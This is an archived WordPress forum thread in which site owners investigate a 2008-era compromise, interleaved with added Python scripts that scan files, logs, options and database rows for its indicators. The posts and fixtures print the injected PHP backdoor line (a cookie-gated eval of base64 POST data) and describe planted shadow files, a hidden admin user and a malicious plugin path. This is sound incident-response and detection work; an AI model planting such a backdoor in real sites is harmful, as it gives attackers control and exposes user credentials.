• This issue actually involves several sites, running versions 2.1.3, 2.3, 2.3.1, 2.3.2, 2.3.3 and 2.5

    A couple of the sites had wp-content/uploads writable so they could upload images for use in posts, and files in wp-content/themes writable so they could make theme updates from inside WP.

    Back in early March, I found that several sites had been hit with the ro8kfbsmag.txt hack as mentioned in several threads here, and I’d cleaned those up and upgraded to 2.3.3, since 2.5 wasn’t yet available as a release.

    This past weekend, I discovered several of those sites plus a few additional ones, including 2 brand new sites with 2.5 installed, had many of their files in the writable directories compromised, a bunch of suspicious files uploaded, and database modifications that I cannot explain.

    I’m still trying to unravel the mess and clean it up, but here’s a rundown of tell-tale signs I’ve found.

    Check any .php file for this code added to the top of the file:
    <?php if(md5($_COOKIE['_wp_debugger'])=="--hash excised--"){ eval(base64_decode($_POST['file'])); exit; } ?>

    See if there are any files in writable directories that have the same name as an existing file with the extensions _new.php, _old.php, .php.pngg, .php.jpgg, or .php.giff. These files will be executables that when called from a browser will display a fake “404 Not Found” error, but if called from a script with the matching hash from one of the hacked PHP scripts, will display system info about the server your site is sitting on. Haven’t yet figured out where or how that info is sent to anyone.

    I can send a copy of the script to anyone in WP security if needed, but I don’t know if this kind of thing is preferred to be attached, inline, or zipped, or anything.

    Also see if there’s a wp-info.txt file anywhere in your hierarchy. This file will contain userinfo dumped from the MySQL database… usernames, emails, passwords, everything. Move it ASAP, but check your logs to see if it was accessed already.

    One other thing I noticed, and this happened on the new 2.5 installs as well as the older ones that hadn’t been upgraded yet, was the silent addition of the user “WordPress”, with no info save a password, and an add date of all zeroes. There’s also no indication of user level in the database, and the user doesn’t show up in the User menu. However, when I was going through and deleting unnecessary “admin” logins, “WordPress” came up as one of the user options to reassign posts to… otherwise it might have been a while before I’d found that buried in the database.

    So I’ve asked all the users on those sites to update their passwords, even if they’d just changed them after the ro8kfbsmag hack, but I have to wonder if I missed anything when cleaning up after that hack that they used to continue to get in and do the more widespread and scary stuff of planting of these new scripts to collect system info.

    As far as I can tell, some of these sites may have been compromised for as long as a month, but all of the added files I’ve listed here were added on Apr 10 and Apr 11, except for one site that seems to have had those changes made on Apr 5.

    I am in the process of changing the DB passwords on those sites, and deleting the new “WordPress” user, but any insight on where this might have started would be welcomed. This new user also happened on sites ranging from 2.1 to 2.3 to 2.5.

    What I don’t know yet is if one site was the “in” door, and the rest were compromised by the one script, or if the sites were individually hacked the same way.
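Added example, not from the thread or any of its posters: a Python triage script that walks a WordPress install and reports the three indicators the post above names (the cookie-gated eval line at the top of .php files, shadow files with the _new.php / _old.php / .php.pngg / .php.jpgg / .php.giff endings, and a wp-info.txt dump). The directory layout, the fixture files and the PLACEHOLDER_HASH value are constructed; the real md5 value was excised in the post, so the pattern matches the shape of the injected line rather than a specific hash.

```python
"""Triage script (added example, not from the thread): walk a WordPress tree
and report the indicators the post above describes."""
import os
import re
import tempfile

# Shape of the injected line: cookie-gated eval of base64 POST data. The md5
# value in the thread was excised, so match the structure, not a hash.
BACKDOOR_RE = re.compile(
    r"md5\(\$_COOKIE\['_wp_debugger'\]\).{0,120}?"
    r"eval\(base64_decode\(\$_POST\['file'\]\)\)",
    re.DOTALL,
)
# Endings of the shadow files named in the thread.
BAD_SUFFIXES = ("_new.php", "_old.php", ".php.pngg", ".php.jpgg", ".php.giff")
DUMP_NAME = "wp-info.txt"


def shadowed_original(name):
    """Return the .php name a shadow file mimics (index_old.php -> index.php),
    or None if the name has no suspicious ending."""
    for suffix in BAD_SUFFIXES:
        if name.endswith(suffix) and len(name) > len(suffix):
            return name[: -len(suffix)] + ".php"
    return None


def scan_tree(root):
    """Walk root and collect findings. 'sibling' entries are (path, bool)
    where the bool says whether the mimicked .php file sits beside it."""
    findings = {"backdoor": [], "sibling": [], "dump": []}
    for dirpath, _dirs, files in os.walk(root):
        present = set(files)
        for name in sorted(files):
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            if name == DUMP_NAME:
                findings["dump"].append(rel)
            original = shadowed_original(name)
            if original is not None:
                findings["sibling"].append((rel, original in present))
            if name.endswith(".php"):
                # The injected line sits at the top, so the first 8 KiB suffice.
                with open(path, "rb") as fh:
                    head = fh.read(8192).decode("latin-1")
                if BACKDOOR_RE.search(head):
                    findings["backdoor"].append(rel)
    for key in findings:
        findings[key].sort()
    return findings


# Constructed sample of the injected line, with a placeholder for the hash.
BACKDOOR_SAMPLE = (
    "<?php if(md5($_COOKIE['_wp_debugger'])==\"PLACEHOLDER_HASH\")"
    "{ eval(base64_decode($_POST['file'])); exit; } ?>\n"
)


def build_demo_tree():
    """Constructed fixture: a clean theme file, an injected one, two shadow
    files and a dump file. Returns the temporary root."""
    root = tempfile.mkdtemp(prefix="wp-triage-")
    files = {
        "wp-content/themes/classic/index.php": "<?php get_header(); ?>\n",
        "wp-content/themes/classic/header.php": BACKDOOR_SAMPLE + "<?php wp_head(); ?>\n",
        "wp-content/themes/classic/header_old.php": "<?php /* constructed shadow file */ ?>\n",
        "wp-content/uploads/2008/04/image.php.jpgg": "<?php /* constructed shadow file */ ?>\n",
        "wp-content/uploads/wp-info.txt": "constructed placeholder, no real data\n",
    }
    for rel, body in files.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(body)
    return root


def demo():
    """Scan the constructed tree; used by the usage line below."""
    return scan_tree(build_demo_tree())


if __name__ == "__main__":
    for kind, hits in demo().items():
        print(f"{kind}: {hits}")
```

Point `scan_tree` at the document root of a real install; a `sibling` hit whose flag is True is the pattern the post describes (a planted file sitting next to the legitimate one it mimics), while a False flag still deserves a look, since uploads directories normally contain no .php at all.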

Viewing 15 replies - 31 through 45 (of 53 total)
  • okay, I figured a couple things out…

    there’s a few strange looking databases in my phpadmin area, most look similar to this :

    “rss_1f6c214c60d29cacd0400469cc53ff37”

    and then, inside those, there’s RIDICULOUS lines of code filled with all sorts of link bait and queries I’ve been seeing hit my blog.

    So I’m going to delete them now. I figure I have a backup of the whole database so if I break something I can restore it… but I’m feeling pretty confident here since inside those entries I’m seeing all sorts of evil looking copy and links :

    O:9:"MagpieRSS":17:{s:6:"parser";i:0;s:12:"current_item";a:0:{}s:5:"items";a:1:{i:0;a:3:{s:5:"title";s:16:"No results found";s:11:"description";s:43:"No results were found for https://burst/blog";s:7:"summary";s:43:"No results were found for https://burst/blog";}}s:7:"channel";a:10:{s:9:"generator";s:15:"Technorati v1.0";s:9:"webmaster";s:43:"[email protected] (Technorati Support)";s:4:"docs";s:37:"https://blogs.law.harvard.edu/tech/rss";s:3:"ttl";s:2:"60";s:4:"tapi";a:3:{s:6:"result";s:5:"
        ";s:10:"result_url";s:17:"https://burst/blog";s:19:"result_rankingstart";s:1:"0";}s:6:"result";s:16:"
    
    ";s:5:"title";s:23:"Technorati Search for: ";s:4:"link";s:17:"https://burst/blog";s:7:"pubdate";s:29:"Thu, 01 Jan 1970 00:00:00 GMT";s:7:"tagline";N;}s:9:"textinput";a:4:{s:5:"title";s:17:"Search Technorati";s:11:"description";s:43:"Search millions of blogs for the latest on:";s:4:"name";s:1:"s";s:4:"link";s:32:"https://technorati.com/search.php";}s:5:"image";a:3:{s:3:"url";s:50:"https://static.technorati.com/pix/logos/logo_sm.gif";s:5:"title";s:15:"Technorati logo";s:4:"link";s:21:"https://technorati.com";}s:9:"feed_type";s:3:"RSS";s:12:"feed_version";s:3:"2.0";s:5:"stack";a:0:{}s:9:"inchannel";b:0;s:6:"initem";b:0;s:9:"incontent";b:0;s:11:"intextinput";b:0;s:7:"inimage";b:0;s:13:"current_field";s:0:"";s:17:"current_namespace";b:0;s:19:"_CONTENT_CONSTRUCTS";a:6:{i:0;s:7:"content";i:1;s:7:"summary";i:2;s:4:"info";i:3;s:5:"title";i:4;s:7:"tagline";i:5;s:9:"copyright";}}

    FYI, this exploit extends to 1.5.2 as well. Yeah, I know I have blogs that I need to upgrade… sigh.

    I could not find wp-info anywhere, but had several instances of the backdoor code in php files, several _old.jpgg etc, a phantom wordpress() user and it does indeed say it’s running 2.5… I am having problems getting into phpMyAdmin (probably unrelated), so I can’t say for certain what is in there. From the date codes it looks like I was hit twice, one time on the 16th and once on the 25th, IIRC.

    After almost 12 hours, I was able to finally fix the WordPress 2.5.1 “still needs to upgrade to 2.5.1.” issue. Most of the suggestions were mentioned already but here are links and steps that might help.

    MAKE SURE YOU BACK UP YOUR DATABASE BEFORE DOING THIS!

    After upgrading my WordPress version 2.5 to 2.5.1, the dashboard is still telling me that I’m still on version 2.5. That’s what brought me to the forums and eventually I found out I have those _new, _old, .pngg.php, .jpgg.php, etc. files in my content directory. So I immediately deleted that. For some reason though I can’t find the ‘wp-info.txt’ file, even while viewing the hidden files (using filezilla).

    This was the most helpful link I got:

    1. https://wordpressphilippines.org/blog/has-your-wordpress-been-hacked-recently/ – read carefully and follow as instructed.

    2. Make sure you delete the phantom “WordPress” user. To instantly check if you have that user, go to your WordPress admin “users” page, enter “WordPress” under Search Users; if you DO NOT get a “No matching users were found!”, you definitely have the phantom user in your database. You will notice a weird blank box appearing if you have that user. Another easy way is to Write Post, scroll down to Post Author, if there’s an “invisible” author, that’s the phantom WordPress user.

    Check the link provided on #1, and delete it by accessing your database.

    3. As mentioned in one of the entries above, look under database wp_options the VALUES ‘active_plugins’ and ‘deactivated_plugins’. It is very likely you will notice a plug-in that’s not supposed to be there. Here’s what I get in mine:

    i:0;s:117:"../../../../../../../../../../../../../../../../../../../../../../tmp/tmpw6d0cG/sess_dea436 and so on (a very long plug-in entry)

    Remove that entry. If it works, then fine. If it doesn’t, you can delete the entire line entry (active_plugins and deactivated_plugins) and WordPress will automatically create new entries BUT MAKE SURE YOU BACKUP FIRST! THIS HAS NOT BEEN VERIFIED TO WORK FOR EVERYONE, but that’s what I did on mine and it worked. When I enter the admin page, I just have to re-activate the plug-ins.

    Check your dashboard. You’ll read the message: “This is WordPress version 2.5.1.”. BACKUP your database immediately to help you against new or missed exploits.

    What I noticed is that removing the offensive files will still give you the false version message in your dashboard. What cleared it are steps #2 and #3.

    I strongly suggest you download the WP Security Scan plug-in (newly updated, just google it). It checks your writable directories as an added insurance that your directories have the correct chmod. If you tend to edit your themes often, don’t forget to give them back their original permissions for added security.

    I hope this helps. BACKUP first before trying.
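Added example, not from the thread or its posters: both the rss_ cache rows quoted a few posts up and the active_plugins value quoted in step 3 are PHP serialize() output, so a small reader for that format lets you decode such values offline and check them mechanically instead of eyeballing them in phpMyAdmin. The reader handles the scalar and array tags (N, b, i, d, s, a) that WordPress option values use; it does not decode the O: object records of the MagpieRSS rows. The flagging rule, the helper that builds the sample, and the placeholder path are my assumptions; the real entry the poster saw was a 117-byte path into a /tmp session directory.

```python
"""PHP serialize() reader (added example, not from the thread) for inspecting
WordPress option values such as active_plugins."""
import re


class PhpUnserializer:
    """Decodes the subset of PHP serialize() output used by WordPress option
    values: N (null), b (bool), i (int), d (float), s (string) and a (array,
    returned as a dict). Lengths are byte counts, so work on bytes."""

    def __init__(self, data):
        self.data = data.encode("utf-8") if isinstance(data, str) else bytes(data)
        self.pos = 0

    def _read_until(self, delim):
        end = self.data.index(delim, self.pos)
        token = self.data[self.pos:end].decode("ascii")
        self.pos = end + 1
        return token

    def parse(self):
        tag = chr(self.data[self.pos])
        self.pos += 2  # skip the tag and the ':' (or ';' for N)
        if tag == "N":
            return None
        if tag == "b":
            return self._read_until(b";") == "1"
        if tag == "i":
            return int(self._read_until(b";"))
        if tag == "d":
            return float(self._read_until(b";"))
        if tag == "s":
            length = int(self._read_until(b":"))
            start = self.pos + 1  # skip the opening quote
            value = self.data[start:start + length].decode("utf-8", "replace")
            self.pos = start + length + 2  # closing quote and ';'
            return value
        if tag == "a":
            count = int(self._read_until(b":"))
            self.pos += 1  # '{'
            result = {}
            for _ in range(count):
                key = self.parse()
                result[key] = self.parse()
            self.pos += 1  # '}'
            return result
        raise ValueError(f"unsupported tag {tag!r} at offset {self.pos - 2}")


def php_serialize_strings(items):
    """Encode a list of strings as PHP serialize() would (demo helper used to
    build the constructed sample below)."""
    body = "".join(f'i:{i};s:{len(v.encode("utf-8"))}:"{v}";' for i, v in enumerate(items))
    return f"a:{len(items)}:{{{body}}}"


# A legitimate entry is a relative path inside wp-content/plugins ending in .php.
PLUGIN_PATH_RE = re.compile(r"^[A-Za-z0-9_.-]+(/[A-Za-z0-9_.-]+)*\.php$")


def suspicious_plugins(serialized):
    """Return (index, entry) pairs from an active_plugins value that contain
    '..', start with '/', or are not a plain .php path (assumed rule)."""
    entries = PhpUnserializer(serialized).parse()
    flagged = []
    for key, value in entries.items():
        if (not isinstance(value, str) or ".." in value
                or value.startswith("/") or PLUGIN_PATH_RE.match(value) is None):
            flagged.append((key, value))
    return flagged


# Constructed sample modelled on the fragment quoted in step 3; the path is a
# placeholder, not the value from the thread.
SAMPLE_ACTIVE_PLUGINS = php_serialize_strings([
    "akismet/akismet.php",
    "../../../../../../../../tmp/tmpPLACEHOLDER/sess_PLACEHOLDER",
])

if __name__ == "__main__":
    print(PhpUnserializer(SAMPLE_ACTIVE_PLUGINS).parse())
    print("flagged:", suspicious_plugins(SAMPLE_ACTIVE_PLUGINS))
```

Paste the raw option_value from wp_options into `suspicious_plugins`; anything it flags is an entry WordPress will try to include on every page load, which is why removing the files alone did not clear the problem for the poster.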

    ultrasonic, this was a HUGE help.

    I’ll be keeping an eye on my db for a while to see if more problems crop up.

    Thanks so much for all the sleuthing.

    I don’t know if this is helpful information to anyone trying to track down the source of this problem, but I’ll post it just in case.

    I discovered the hack today when I tried to upgrade from 2.5 to 2.5.1. After following this thread, I found the offending lines of php code in one of my templates, plus all the rest.

    Up until April 19, I was running WP 2.0.4. On April 19, I backed up my entire site in preparation for the move to 2.5.

    I’ve had a look through that backup. On that date, my template files were OK. So the hack hadn’t been triggered yet. However, in my wp-content/uploads folder, there is a file called js.php, dated April 3.

    This file seems to be the one with the payload for the hack. I’m not really a php coder but have enough of a software background to recognize it’s not doing nice things, and believe I’ve found the piece of code that injects the offending line of PHP code into the beginning of people’s files. The file makes several references to the following URL https://unurex.cn

    Is there anyone I can send this file to for study? I’m not that familiar with the system around here.

    Katrina

    Me again.

    After studying the payload file, I would really appreciate someone more competent than me having a look:

    1) To tell me the extent of the damage to my security. What exactly did the hack do and what did the hackers get from me?

    2) To tell me if the steps mentioned by above posters are sufficient for getting rid of it. js.php seems to try to restore the hack, or embed stuff to restore it. It also seems to affect wp-includes/functions.php, or try to, which worries me, because I hadn’t seen that mentioned by anyone yet. I’m assuming my update to 2.5.1 clobbered whatever it did to functions.php, but I can’t be sure.

    Just tell me who to communicate with to send the file to and I will pass it along.

    Kat

    Hm.. my site got hacked too.. It seems that all the index.htm/index.php files contained in my public_html folders were deleted and switched. I’m using wordpress version 2.5. In addition, index files in subdomains that were locked up were also switched.

    https://sgorchids.com/

    I will be leaving my site the way it is for a while till about two weeks later. Just wondering if anybody experienced security issues with wordpress version 2.5.1 yet? I’m hoping to rebuild my site on a security stable version of wordpress.

    ultrasonic: thanks for all your hard work on this – I finally got everything cleaned up on my installation. Much appreciated.

    I’ve had a couple of sites hit by this, and spent a while cleaning up the mess. Now that’s done, I’ve been looking at the logs and all the accesses I can find so far for the hacked files are from two IP addresses, both in the same block:

    194.110.162.23 and 194.110.162.79

    The earlier accesses are with the .23 and later ones .79. The block is registered to extendedhost.com in Canada, though there is no website there I can find.

    Will continue to dig a little and see what else I can find.
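Added example, not from the thread or its posters: the log review the post above describes, as a Python sweep over Apache combined-format access log lines that tallies, per client address, every request for one of the thread's indicator filenames, with first and last timestamps. The log lines are constructed (documentation-range addresses, not the ones the poster reported), and the log format is an assumption; adjust `LOG_RE` if your host writes a different one.

```python
"""Access-log sweep (added example, not from the thread): which clients
requested the indicator files, and when."""
import re

# Apache combined format: ip ident user [ts] "METHOD path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
# Request paths ending in one of the thread's indicator names (query stripped).
INDICATOR_RE = re.compile(r"(_new\.php|_old\.php|\.php\.(?:pngg|jpgg|giff)|/wp-info\.txt)$")


def indicator_accesses(lines):
    """Return (hits, unparsed). hits maps ip -> {count, first, last, paths}
    for requests to indicator files, assuming lines arrive in log order;
    unparsed counts lines that did not match the format."""
    hits, unparsed = {}, 0
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            unparsed += 1
            continue
        path = m.group("path").split("?", 1)[0]
        if INDICATOR_RE.search(path) is None:
            continue
        rec = hits.setdefault(
            m.group("ip"), {"count": 0, "first": m.group("ts"), "last": None, "paths": set()}
        )
        rec["count"] += 1
        rec["last"] = m.group("ts")
        rec["paths"].add(path)
    return hits, unparsed


def report(hits):
    """One line per address, sorted by hit count, for a quick read."""
    rows = sorted(hits.items(), key=lambda kv: (-kv[1]["count"], kv[0]))
    return [
        f"{ip}: {rec['count']} hit(s), {rec['first']} .. {rec['last']}, "
        + ", ".join(sorted(rec["paths"]))
        for ip, rec in rows
    ]


# Constructed sample log (RFC 5737 addresses); one line is deliberately malformed.
SAMPLE_LOG = """\
192.0.2.10 - - [10/Apr/2008:03:12:41 +0000] "GET /wp-content/themes/classic/header_old.php HTTP/1.1" 200 1834 "-" "Mozilla/4.0"
192.0.2.10 - - [10/Apr/2008:03:13:05 +0000] "POST /wp-content/uploads/image.php.jpgg HTTP/1.1" 200 512 "-" "Mozilla/4.0"
198.51.100.5 - - [10/Apr/2008:08:00:02 +0000] "GET /index.php HTTP/1.1" 200 9120 "-" "Mozilla/5.0"
192.0.2.77 - - [11/Apr/2008:22:41:19 +0000] "GET /wp-content/uploads/wp-info.txt?x=1 HTTP/1.1" 200 40311 "-" "Wget/1.10"
198.51.100.5 - - [11/Apr/2008:22:50:00 +0000] "GET /wp-content/uploads/2008/04/photo.jpg HTTP/1.1" 200 3302 "-" "Mozilla/5.0"
this line is deliberately malformed
"""

if __name__ == "__main__":
    found, bad = indicator_accesses(SAMPLE_LOG.splitlines())
    print("\n".join(report(found)))
    print(f"{bad} line(s) did not parse")
```

Feed it the concatenated logs of every site you host (`indicator_accesses(open(path))` works line by line), because the earliest hit across all sites is what tells you which install was the way in.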

    I have installed wordpress 2-3 times, taking a new build from www.remarpro.com. But after some hours, it gets hacked by some person called cesar. Can you please check if there is some loophole that needs to be patched!

    my site URL is https://aksblogger.com

    Regards,
    AKS.
    https://Shrink2One.com

    As a final clean-up note for your databases, not only should you check your active plugins database entry in wp_options, but in your wp_posts, and wp_postmeta tables, look for the following and delete these entries:

    in wp_posts:
    any post titled rzf.txt (or a filename/title you do not recognize). Make a note of the post_id if you find any of these.

    in wp_postmeta:
    entries that list an attachment for the post_id you noted above. They will have meta_keys of _wp_attached_file and _wp_attachment_metadata and post_ids matching any hidden posts you found above. the meta_value will point to files like rzf.txt, or the bad pngs and jpegs mentioned in prior posts

    I was just doing some extra surveying of my site when I came across these entries I overlooked the first time around. Since I’d cleared the attachments out of uploads already, no extra harm done.

    Crazy hackers…
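Added example, not from the thread or its posters: the wp_posts / wp_postmeta sweep described in the post above, plus the check for the hidden “WordPress” user from the opening post (zeroed registration date, no capabilities row, absent from the Users menu), written as SQL and run against a constructed in-memory SQLite copy of the four tables. Table names assume the default `wp_` prefix (so the capabilities key is `wp_capabilities`), the schema is cut down to the columns the queries need, and every row is made up; the same statements apply to MySQL through phpMyAdmin.

```python
"""Database sweep (added example, not from the thread): planted attachment
posts and the phantom user, as SQL over a constructed in-memory copy."""
import sqlite3

# Constructed schema: only the columns this sweep needs, default "wp_" prefix.
SCHEMA = """
CREATE TABLE wp_posts (ID INTEGER PRIMARY KEY, post_title TEXT, post_type TEXT);
CREATE TABLE wp_postmeta (meta_id INTEGER PRIMARY KEY, post_id INTEGER, meta_key TEXT, meta_value TEXT);
CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_registered TEXT);
CREATE TABLE wp_usermeta (umeta_id INTEGER PRIMARY KEY, user_id INTEGER, meta_key TEXT, meta_value TEXT);
"""
# Filename endings the thread associates with the planted files.
INDICATOR_SUFFIXES = (".txt", "_new.php", "_old.php", ".php.pngg", ".php.jpgg", ".php.giff")
# '_' is a LIKE wildcard, so escape it and declare the escape character.
LIKE_PAIR = "m.meta_value LIKE ? ESCAPE '\\' OR p.post_title LIKE ? ESCAPE '\\'"


def open_demo_db():
    """In-memory copy with constructed rows: one real upload, two planted
    attachments, one real admin and one phantom user."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany("INSERT INTO wp_posts VALUES (?,?,?)", [
        (1, "Hello world!", "post"),
        (2, "photo", "attachment"),
        (3, "rzf.txt", "attachment"),
        (4, "image", "attachment"),
    ])
    conn.executemany("INSERT INTO wp_postmeta VALUES (?,?,?,?)", [
        (1, 2, "_wp_attached_file", "2008/04/photo.jpg"),
        (2, 2, "_wp_attachment_metadata", 'a:1:{s:4:"file";s:17:"2008/04/photo.jpg";}'),
        (3, 3, "_wp_attached_file", "2008/04/rzf.txt"),
        (4, 3, "_wp_attachment_metadata", 'a:1:{s:4:"file";s:15:"2008/04/rzf.txt";}'),
        (5, 4, "_wp_attached_file", "2008/04/image.php.jpgg"),
        (6, 4, "_wp_attachment_metadata", 'a:1:{s:4:"file";s:22:"2008/04/image.php.jpgg";}'),
    ])
    conn.executemany("INSERT INTO wp_users VALUES (?,?,?)", [
        (1, "admin", "2008-03-01 10:00:00"),
        (2, "WordPress", "0000-00-00 00:00:00"),
    ])
    conn.executemany("INSERT INTO wp_usermeta VALUES (?,?,?,?)", [
        (1, 1, "wp_capabilities", 'a:1:{s:13:"administrator";b:1;}'),
    ])
    return conn


def find_suspect_attachments(conn, suffixes=INDICATOR_SUFFIXES):
    """Rows (post_id, title, attached_file) whose attached file or title ends
    with an indicator suffix."""
    clauses = " OR ".join(LIKE_PAIR for _ in suffixes)
    params = []
    for s in suffixes:
        params += ["%" + s.replace("_", "\\_")] * 2
    sql = (
        "SELECT DISTINCT p.ID, p.post_title, m.meta_value "
        "FROM wp_posts p JOIN wp_postmeta m ON m.post_id = p.ID "
        f"WHERE m.meta_key = '_wp_attached_file' AND ({clauses}) ORDER BY p.ID"
    )
    return conn.execute(sql, params).fetchall()


def find_phantom_users(conn):
    """Users with a zeroed registration date or no wp_capabilities row, the
    two traits the opening post reports for the hidden account."""
    sql = (
        "SELECT u.ID, u.user_login FROM wp_users u "
        "LEFT JOIN wp_usermeta m ON m.user_id = u.ID AND m.meta_key = 'wp_capabilities' "
        "WHERE m.umeta_id IS NULL OR u.user_registered = '0000-00-00 00:00:00' ORDER BY u.ID"
    )
    return conn.execute(sql).fetchall()


def remove_attachment_posts(conn, post_ids):
    """Delete the flagged posts and every meta row that references them, in
    one transaction; returns (posts_deleted, meta_deleted)."""
    marks = ",".join("?" * len(post_ids))
    with conn:
        meta = conn.execute(f"DELETE FROM wp_postmeta WHERE post_id IN ({marks})", post_ids).rowcount
        posts = conn.execute(f"DELETE FROM wp_posts WHERE ID IN ({marks})", post_ids).rowcount
    return posts, meta


if __name__ == "__main__":
    db = open_demo_db()
    print("phantom users:", find_phantom_users(db))
    flagged = find_suspect_attachments(db)
    print("planted attachments:", flagged)
    print("deleted (posts, meta):", remove_attachment_posts(db, [row[0] for row in flagged]))
```

Run the two SELECTs against the real database first and read the rows before deleting anything; the DELETE runs in a transaction so a wrong ID list can be rolled back, but only a backup taken beforehand protects against a mistaken commit.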

    Seems to me hundreds of thousands of wordpress sites got hacked and wordpress doesn’t know exactly how it happened.

    I was using the current version each time my site was hacked.

    I too have undergone an attack on a blog of mine; I found the same plug-in, only modified.

    Source code here:

    https://wordpress.pastebin.com/f7e85d3e4

  • The topic ‘Security issue, multiple sites’ is closed to new replies.